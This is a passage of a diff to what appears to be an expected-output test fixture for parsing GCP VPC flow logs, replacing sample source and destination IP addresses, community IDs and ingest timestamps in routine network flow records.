] }, @@ -22360,8 +22360,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869226600Z", - "original": "{\"insertId\":\"1gq7q7afe373f2\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":50364},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:08.797851544Z\",\"packets_sent\":\"9\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:08.412738626Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392412600Z", + "original": "{\"insertId\":\"1gq7q7afe373f2\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":50364},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:08.797851544Z\",\"packets_sent\":\"9\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:08.412738626Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.412738626Z", "end": "2019-06-14T03:40:08.797851544Z", @@ -22382,9 +22382,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 50364, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -22398,7 +22398,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:peICi+mlxd/skeLBLZFlScKlq64=", + "community_id": "1:0TTLV6IDTX3Y7z7HtKV0pV2QKHY=", "bytes": 1784, "transport": "tcp", "type": "ipv4", @@ -22413,7 +22413,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { @@ -22437,8 +22437,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869229300Z", - "original": "{\"insertId\":\"1gq7q7afe373ee\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":50364,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:08.797851544Z\",\"packets_sent\":\"8\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.412738626Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392418300Z", + "original": "{\"insertId\":\"1gq7q7afe373ee\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":50364,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:08.797851544Z\",\"packets_sent\":\"8\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.412738626Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.412738626Z", "end": "2019-06-14T03:40:08.797851544Z", @@ -22465,17 +22465,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 33126, "bytes": 1457, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:sXU+vhS+/ljMyFECIDnNyFQq2qU=", + "community_id": "1:WVHhCd41Iy4u55Nq5yD2UbPpH/M=", "bytes": 1457, "transport": "tcp", "type": "ipv4", @@ -22489,7 +22489,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, @@ -22514,8 +22514,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869232300Z", - "original": "{\"insertId\":\"1gq7q7afe373ey\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":33126},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:50.919744677Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:50.809605761Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392422600Z", + "original": "{\"insertId\":\"1gq7q7afe373ey\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33126},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:50.919744677Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:50.809605761Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:44:50.809605761Z", "end": "2019-06-14T03:44:50.919744677Z", @@ -22544,17 +22544,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65318, "bytes": 73215, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 747 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:GgfFDV/IDDGuMmQ9Zk+/ReCe5Rk=", + "community_id": "1:abTkiqsELuUBAWswX/nZozHWPVo=", "bytes": 73215, "transport": "tcp", "type": "ipv4", @@ -22568,7 +22568,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -22593,8 +22593,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869235100Z", - "original": "{\"insertId\":\"1gq7q7afe373e7\",\"jsonPayload\":{\"bytes_sent\":\"73215\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65318},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"747\",\"reporter\":\"DEST\",\"rtt_msec\":\"96\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760345858Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392426800Z", + "original": "{\"insertId\":\"1gq7q7afe373e7\",\"jsonPayload\":{\"bytes_sent\":\"73215\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65318},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"747\",\"reporter\":\"DEST\",\"rtt_msec\":\"96\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760345858Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.760345858Z", "end": "2019-06-14T03:49:56.220599950Z", @@ -22615,9 +22615,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 53096, - "ip": "203.0.113.12" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -22631,7 +22631,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:46cExc+emRbBX/kM/ZWcv8rVUgE=", + "community_id": "1:PZTJxnZbum9ENBi23DLcdTxQuaQ=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -22646,7 +22646,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.12" + "67.43.156.13" ] }, "gcp": { @@ -22670,8 +22670,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869237800Z", - "original": "{\"insertId\":\"1gq7q7afe373f8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"203.0.113.12\",\"dest_port\":53096,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:20.813699795Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:20.700692281Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392430200Z", + "original": "{\"insertId\":\"1gq7q7afe373f8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53096,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:20.813699795Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:20.700692281Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:43:20.700692281Z", "end": "2019-06-14T03:43:20.813699795Z", @@ -22698,18 +22698,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 176465, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 65 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:HQLAb7M1d/3INTFS0VfYPWDgNSc=", + "community_id": "1:fI3fEoMHmZ6GEw9+CNJ6V2s6dfw=", "bytes": 176465, "name": "default", "transport": "tcp", @@ -22731,7 +22731,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -22768,8 +22768,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869240500Z", - "original": "{\"insertId\":\"1gq7q7afe373ec\",\"jsonPayload\":{\"bytes_sent\":\"176465\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33570,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"65\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466779642Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392434600Z", + "original": "{\"insertId\":\"1gq7q7afe373ec\",\"jsonPayload\":{\"bytes_sent\":\"176465\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33570,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"65\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466779642Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466779642Z", "end": "2019-06-14T03:49:51.821302149Z", @@ -22790,9 +22790,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 33126, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -22806,7 +22806,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:sXU+vhS+/ljMyFECIDnNyFQq2qU=", + "community_id": "1:WVHhCd41Iy4u55Nq5yD2UbPpH/M=", "bytes": 1776, "transport": "tcp", "type": "ipv4", @@ -22821,7 +22821,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { @@ -22845,8 +22845,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869243100Z", - "original": "{\"insertId\":\"1gq7q7afe373f5\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":33126,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:50.919744677Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:50.809605761Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392440100Z", + "original": "{\"insertId\":\"1gq7q7afe373f5\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33126,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:50.919744677Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:50.809605761Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:44:50.809605761Z", "end": "2019-06-14T03:44:50.919744677Z", @@ -22873,17 +22873,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 56478, "bytes": 1458, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:bLZCzhETfwqvL9yQ1jHjTJwKork=", + "community_id": "1:ZjB7c0mLOtmDfg7yu+dLPbrvJHQ=", "bytes": 1458, "transport": "tcp", "type": "ipv4", @@ -22897,7 +22897,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, @@ -22922,8 +22922,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869245800Z", - "original": "{\"insertId\":\"1gq7q7afe373f6\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":56478},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:20.566586739Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:20.450631492Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392445700Z", + "original": "{\"insertId\":\"1gq7q7afe373f6\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":56478},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:20.566586739Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:20.450631492Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:47:20.450631492Z", "end": "2019-06-14T03:47:20.566586739Z", @@ -22944,10 +22944,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.88", + "address": "67.43.156.14", "port": 52430, "domain": "zeek-nsm", - "ip": "198.51.100.88" + "ip": "67.43.156.14" }, "source": { "address": "10.139.99.242", @@ -22961,7 +22961,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Ymi/D60yNYon9EIJPZfAYxcQ+xc=", + "community_id": "1:qGRQsZIORaZZvgSDCjliRbZbsD0=", "bytes": 32764, "name": "default", "transport": "tcp", @@ -22984,7 +22984,7 @@ "related": { "ip": [ "10.139.99.242", - "198.51.100.88" + "67.43.156.14" ] }, "gcp": { @@ -23020,8 +23020,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869248500Z", - "original": "{\"insertId\":\"1gq7q7afe373fo\",\"jsonPayload\":{\"bytes_sent\":\"32764\",\"connection\":{\"dest_ip\":\"198.51.100.88\",\"dest_port\":52430,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:53.081386115Z\",\"packets_sent\":\"228\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:07.968717244Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392451200Z", + "original": "{\"insertId\":\"1gq7q7afe373fo\",\"jsonPayload\":{\"bytes_sent\":\"32764\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":52430,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:53.081386115Z\",\"packets_sent\":\"228\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:07.968717244Z\